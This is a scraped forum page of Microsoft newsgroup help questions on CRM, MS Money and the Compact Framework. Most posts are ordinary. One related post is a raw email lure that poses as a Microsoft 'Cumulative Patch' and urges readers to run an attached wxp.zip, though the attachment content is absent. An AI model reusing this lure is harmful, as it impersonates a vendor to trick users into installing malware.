| Outlook Client no delete icon |
|
 |
Index ‹ Information Technology ‹ Crm
|
- Previous
- 1
- Compact >> Custom Controls Disappear!?!Hi,
I am breaking my head over this. I have a custom control that I am in turn
using in another customer control. The internal control is a drawing area
based on the open net cf signature control - the code is the same with some
enhancements for undo. Everything works great about it except one thing.
Initially when the controls load, visually everything is there, then at the
last second, the border on my custom drawing control disappears. No
functionality is lost, but it is like the border is being replaced or
covered by something. I have tried invalidate and refresh methods at
different times during the load, but nothing seems to help. If after the
controls are loaded I then invalidate on a button click, the border
reappears. Has anyone seen anything like this?
Thanks
Dave
- 2
- Compact >> Pocket PC Application shortcutHi all,
I managed to get shortcuts added to the start menu, but when I uninstall
the application, these shortcuts are not removed and when I re-install the
application, yet another shortcut is added (a duplicate one).
Please let me know a solution for this problem...
Thanks!
- 3
- 4
- Money >> Canadian Banks? with money 2003I have M$ money 2003. When i try to setup online banking
i notice that there is absolutely NO canadian banks in
the list of banks to choose from. i have the "Canadian
edition"... should there not be "canadian" banks? anyone
figure this out? any help would be greatly appreciated.
thanks
-Kad
- 5
- Money >> Monthly Budget EntryRE: MS MONEY 2006 Retail
Hi, Every step of the way an adventure!!!
I made a split deposit to the "Accounts List" showing $527 tax
return, as Other Income, and $500 OUT to Savings. The $27. remains in
Other Income-Tax Return.
Now the budget Report shows = Other Income:Tax-Return $27.00, This is
not a true, representative figure of "Other Income", which is really
$527., not $27..
How can I post a split entry showing both the $527 IN, and the $500.
OUT, as two separate lines in the Monthly Budget.
ThanX
Mike
- 6
- 7
- Compact >> Borders for panels possible?Is it possible to give borders to panels? I am using a panel for an about
screen and i'd like it to have a black border. If this were asp.net i could
just use styles. Anything for panels in winforms?
- 8
- Money >> Match Multiple Deposits to one Recurning Deposit???I have set up a Recuring Deposit for what my roomate pays me for rent.
It is setup as a manual deposit, fixed amount, and to be automatically
added to my register.
She has a tendency to pay me from two seperate accounts --
(1) a check, which I deposit into checking account
(2) a direct transer from her checking to my checkking account
The amounts change from month to month with regards to what she pays by
check and transfers directly into my checking account.
Is there a way to match up the 2 payments/deposits to my recurring
deposit?
- 9
- Money >> Updating Stock prices Money 2004Is there any reason why when updating Australian stock
prices, it is unable to show the Change pricing or any of
the other views like PE ratios, yields etc ?
It appears to only show the last price quoted. However at
the MSN Money site, all Australian stocks quoted do
indicate the change and % change ?
- 10
- Compact >> Form always on TopHow do i keep a form always on top, like the TopMost Property of a form does, which is not included in the compact framework?
- 11
- Crm >> Multiple outlook desktop client installation is required for shareHi all,
I have a shared workstation which 2 users use in shifts (day shift, night
shift). I want both of users to use MS CRM.
I have 2 seperate Outlook profies for them. Do I need to istall Outlook
desktop client 2 times(once for each user) OR just one installation of the
desktop client will be sufficient?
Please help.
Thanks in advance,
-Imran
- 12
- Money >> No payees in pay to pull down listJust had to re-install Money 2004 Deluxe and open a backup I had saved.
Everything seems to be working as it used to except there are no payees in
the pull down list in the transaction forms (or when using the pull down when
editing in the register). The only item in the pull down list is "Ballance
forward".
When I open the sample.mny, the pull down list is populated there.
I've tried repairing My Money.mny with no luck.
The original file had been created in Money 95 (I believe), but it converted
properly the first time I installed Money 2004.
I'm not using a lot of the features yet, mostly just the basic accounts.
Can't figure out if I did something wrong when I opened the copy or if I
have left some option unchecked.
Thanks in advance for any help...
- 13
- Crm >> URGENT prob. with .Net debug and CRMI've created functions in .Net to add/update/delete Accounts, Contacts, Notes
and, from time to time when I'm debugging in .Net and goes over a line of
code like:
bizUser = New Microsoft.Crm.Platform.Proxy.BizUser
the debugger halts and I get the error:
There is no source code available for the current location
(sorry if the message is not exact, I had to translate it from French which
is:
Il n'y a pas de code source disponible pour l'emplacement en cours.
And i can't go any further with debugging.
I have a Windows server 2003 Standard edition as domain controller running
active directory and SQL server. My CRM server is on a Windows Server 2003
Web edition and my development environment is running Windows XP pro version.
Sometimes the debug works just fine and in other times I get stopped (for a
long period of time) with the preceeding error. I've tried rebooting all
computers (in order ie: Server, Crm server and workstation) and still get
caught by this thing.
Anyone of you seen this problem (and more important, a solution).
Thanks.
- 14
- Money >> M2000 Budget Planning Extra paymentAfter setting up my budget/debt reduction planning
information, I have an erroneous extra payment amount
listed that drastically effects my debt reduction plan.
The screen that allows you to allocate an extra payment
says zero dollars on the slide rule at the bottom but the
text below states a large dollar amount. Where is this
amount comming from, and how do I zero it out or get rid
of it?
- 15
- Compact >> ClipboardHello Everyone,
the .net cf 2.0 supports the clipboard directly, but is there any easy
way to find out, which textbox has the focus? Here is the code, that I
have at the moment and as you can see I have to check for every textbox
if it has the focus. Any ideas how to make this work for every textbox
easier?
Thanks in advance!
Regards,
Andreas
Private Sub miPaste_Click(ByVal sender As System.Object, ByVal e As
System.EventArgs) Handles miPaste.Click, miPaste2.Click
Dim strTextToInsert As String
Dim strTextInForm As String
Dim strNewInForm As String
Dim intPosition As Int16
Dim activeTextbox As TextBox
Dim bolNoAction As Boolean =3D False
'Welche Textbox hat den Fokus? (keine Activecontrol Eigenschaft
in CF.net?)
If txtDecryptText.Focused Then
activeTextbox =3D DirectCast(txtDecryptText, TextBox)
ElseIf txtExpression.Focused Then
activeTextbox =3D DirectCast(txtExpression, TextBox)
ElseIf txtExpression2.Focused Then
activeTextbox =3D DirectCast(txtExpression2, TextBox)
ElseIf txtResult.Focused Then
activeTextbox =3D DirectCast(txtResult, TextBox)
ElseIf txtResult2.Focused Then
activeTextbox =3D DirectCast(txtResult2, TextBox)
ElseIf txtInput.Focused Then
activeTextbox =3D DirectCast(txtInput, TextBox)
Else
bolNoAction =3D True
End If
If bolNoAction =3D False Then
'Ist beim Einf=FCgen Text markiert, diesen vorher l=F6schen
If activeTextbox.SelectedText <> "" Then
activeTextbox.SelectedText =3D ""
End If
'Wo steht der Cursor? Dort den Text einf=FCgen
intPosition =3D CShort(activeTextbox.SelectionStart)
strTextInForm =3D activeTextbox.Text
If
Windows.Forms.Clipboard.GetDataObject.GetData(DataFormats.Text) IsNot
Nothing Then
strTextToInsert =3D
Windows.Forms.Clipboard.GetDataObject.GetData(DataFormats.Text).ToString
strNewInForm =3D strTextInForm.Insert(intPosition,
strTextToInsert)
activeTextbox.Text =3D strNewInForm
End If
End If
End Sub
|
| Author |
Message |
littleshell

|
Posted: Tue Aug 14 12:16:06 CDT 2007 |
Top |
Crm >> Outlook Client no delete icon
Hello,
Some of my users cant see the delete button when in the queues section of
the outlook client. If they use the web client it is there fine, any ideas?
Information Technology224
|
| |
|
| |
 |
DavidJennaway

|
Posted: Tue Aug 14 12:16:06 CDT 2007 |
Top |
Crm >> Outlook Client no delete icon
I think this 'feature' is considered 'by design' by Microsoft, though it
might be more that it's by accident, as I can't see any reason for it
--
David Jennaway - Microsoft Dynamics CRM MVP
Web: http://www.excitation.co.uk
"Ian" wrote:
> Hello,
>
> Some of my users cant see the delete button when in the queues section of
> the outlook client. If they use the web client it is there fine, any ideas?
>
>
|
| |
|
| |
 |
| |
 |
Index ‹ Information Technology ‹ Crm |
- Next
- 1
- SBS >> Offload to D: driveI have a Server running SBS 2003 with a 10gb system partition and 70gb data
partition. My 10gb partition is filling up fast! Can someone make a
suggestion as to what I could offload to my data partion, such as Exchange
private mailboxes etc..., to free up some space??? When I set this thing up
I had 5gb or 6gb available but it has filled up within a couple of months, I
have only added a couple of apps (Trend Micro OfficeScan and an app the
company uses). I think it is Exchange that is filling up (priv1.edb-977mb,
priv1.stm-293mb... I was wondering how I might go about moving the
information stores to the D: drive or if this is even a good idea?
Thanks
BC
- 2
- SVCS >> Expression based connection stringsHi Folks,
I am having difficulty using expression based connection strings. I have
followed the instructions in this posting
http://blogs.msdn.com/bimusings/archive/2006/07/20/673051.aspx
, and as far as I can tell, I have everything set up correctly, but when I
put in the ServerName parameter and run the report I get an error,
"An error has occurred during report processing.
Cannot create a connection to data source 'AWDQuery'.
For more information about this error navigate to the report server on the
local server machine, or enable remote errors "
When I send the connection string to a text box to check it, it is fine. I
even copied it out of the text box and inserted it into another report to
ensure there wasn't a stray control character embedded. Here is the data
source connection string from the XML file.
"data source=" & Parameters!ServerName.Value & ";initial catalog=AWDQuery;"
ServerName is a valid parameter on the report.
I am using SQL Server 2005.
Any ideas?
Thanks,
Bob
- 3
- Messanger >> Jonathon: Uninstalling MSNMessenger 6.0Jonathan:
Would you also have a command line to remove Messenger 6.0 from the
Run/command line for win98se (like the one you had for XP)? At the Control
Panel/ Add/Remove programs I don't seem to have that option. It just gives
me an install option (not an uninstall) and I get the "msnmsgr.msi"
message. Would just like to clean it out and start fresh. I have IE6 with
all updates, win98se.
Thanks
Mike
- 4
- SBS >> Can not browse or ping nw printer from XP PROHi
I have a SMS 2003 network with 5 ws (1 Win 2000 and 4 Win XP Pro)
I recently installed a HP Photosmart 2620 Inkjetprinter/scanner with
internal networkcard.
I am trying to install it from one of the ws but the software from HP fails
do discover the printer.
I tried to install the sw on the server and there I didnt have any problems
discovering the printer.
From the ws I can ping the server but NOT the printer. Both the ws and the
printer have IP addresses assigens by the server (DHCP)
What am I missing?
- 5
- Compact >> Install this critical patch from M$--mrmqkqeytsnsrvaa
Content-Type: multipart/related; boundary="iawbzbeonxguat";
type="multipart/alternative"
--iawbzbeonxguat
Content-Type: multipart/alternative; boundary="zhwjulvezw"
--zhwjulvezw
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Customer
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your system.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
--zhwjulvezw
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:puglyog" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Customer<BR><BR>
this is the latest version of security update, the
"November 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three newly discovered vulnerabilities.
Install now to help protect your computer
from these vulnerabilities, the most serious of which could
allow an malicious user to run executable on your system.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qixszmy" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qixszmy" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qixszmy" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qixszmy" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qixszmy" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>
<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>
<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/=
contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>
|
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" =
TARGET=3D"_top">Legal</A>
|
<A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" =
TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A>
</FONT></B>
</TD>
</TR>
<TR VALIGN=3D"MIDDLE">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1">
©2003 Microsoft Corporation. All rights reserved.
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/cpyright.htm" TARGET=3D"_top">Terms of Use</A>
|
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/privacy.htm" TARGET=3D"_top">
Privacy Statement</A> |
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
enable/" TARGET=3D"_top">Accessibility</A>
</FONT>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
--zhwjulvezw--
--iawbzbeonxguat
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <puglyog>
R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy
zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29
yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX
55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z
3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk
3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt
9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx
/+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r
9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV
606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO
X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg
4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI
sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg
mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD
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
--iawbzbeonxguat
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <qixszmy>
R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St
3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7
zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ
CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA
IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza
BxcFCjgwgQSJCQcWCggIADs=
--iawbzbeonxguat--
--mrmqkqeytsnsrvaa
Content-Type: application/x-compressed; name="wxp.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment
--mrmqkqeytsnsrvaa--
- 6
- 7
- Crm >> Customizing marketing list view in 3.0I have created a marketing list in CRM 3.0 (member type: contact) but the
marketing list member view only gives me the name, business phone, and city.
I need to add fields including the company name or this list is completely
useless. The customization options I found only allows changes to the view
that contains the list of marketing lists, not the member list. How do I add
fields to this view?
- 8
- Money >> Debt Reduction PlannerI need help determining why my debt reduction planner is
not working properly. The situation is do to a conflict
with how much I plan to pay off each month on my credit
card debt. For example, let's just say that I have a
$1000 balance on my credit card. I want to pay a hundred
dollars toward it for the month. In theory, the planner
will tell me how long it will take to pay off the entire
balance. What is actually happening is that it tells me
that the entire balance will be paid by the end of this
month. I've changed the amount I wish to pay from $0 to
$3000 and it still won't change the date of when the
entire balance is to be paid off by. I even reset the
debt reduction planner with no change. I looked at my
bills & deposits listing and saw that the next
transaction assumed I would pay off the entire payment by
my due date. Ibelieve the problem stems from here but I
don't know how to tell the program that I only want to
pay off a fraction of that amount. Please help!
Technical support was baffled and it must be a simple
solution.
- 9
- Messanger >> MUI Pack for MSN 7hi all,
Is there any MUI Pack for MSN Messenger 7.0.0777??
because I can only find one for MSN Messenger 6.2.0205...
Thanks.
Man
- 10
- 11
- SVCS >> Page header fields on multiple pagesIâ??ve built a report with a subreport at the bottom, both pulling from a
â??Dataset1â??. Iâ??ve also created a â??Dataset2â?? which returns a title, a report
name and a few other fields via textboxes (similar to
Value=ReportItems!Title_1). These textboxes are strictly used in the page
header and footer.
Iâ??ve built a listbox with DataSetName=â??Dataset2â?? which encloses textboxes
with Data.Value = Fields!Title1.Value.
Here is the problem:
Export to pdfâ??When the report is rendered, Page1 header and footer display
data as expected, but sometimes the subreportâ??s data extends into another
page. The following pages fail to show any of the header/footer fields that
page1 displays.
Iâ??ve tried various configurations without success. How can I get the
remaining pages to show the header info like Page1?
BTW: Page header properties PrintOnFirstPage, PrintOnLastPage =True
- 12
- Compact >> Restart ApplicationHi, 2 questions.
1.
I m working in a mobile application and i need restart my application after
i change language settings. How i do that?
2.
I have a Main form and i call another form (frmLanguages), when i change the
language display a msgbox asking if the user want restart application, if
the user choose yes i want call a function in Main form to restart
application.
Armando Rocha
http://www.ifthensoftware.com
- 13
- Compact >> CalendarIt is possible to make a share calendar?
That means, that i can access to an other pocket pc calendar from my pocket
pc?
Best regards
joe
- 14
- Messanger >> Removing contacts from the Blocked ListSure hope some messenger gurus can help me.
I have a long lists of names that have been blocked but
they continue to exist in my blocked list.
I want to delete them completely so they don't show up
anyway in my blocked list. And contacting the individuals
one by one and to ask them to delete me from their MSN
contact list would of course be undiserable. @:)
How do I do that. My list is now unweidly and I would
like to do some housekeeping.
